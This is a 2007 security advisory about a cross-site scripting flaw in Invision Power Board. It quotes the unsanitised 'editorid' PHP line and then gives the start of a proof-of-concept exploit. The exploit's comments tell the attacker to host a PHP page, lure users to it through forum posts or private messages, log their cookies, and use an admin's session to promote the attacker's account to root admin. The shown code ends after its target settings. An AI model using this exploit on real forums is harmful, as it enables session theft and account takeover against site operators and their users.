Invision Power Board Cross Site Scripting Vulnerability
3 Jun. 2007
Summary
A vulnerability in Invision Power Board allows remote attackers to cause a cross site scripting vulnerability which in turn can be used to cause the administrator of the form, or any other privileged user to execute arbitrary commands (SQL commands), the following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by Iron.
The original article can be found at: http://www.ironwarez.info
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Now, post a message on the forum or send a pm to your target with the link to the html page.
# If a normal user views the page, his cookies
# will be logged, funny. If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).
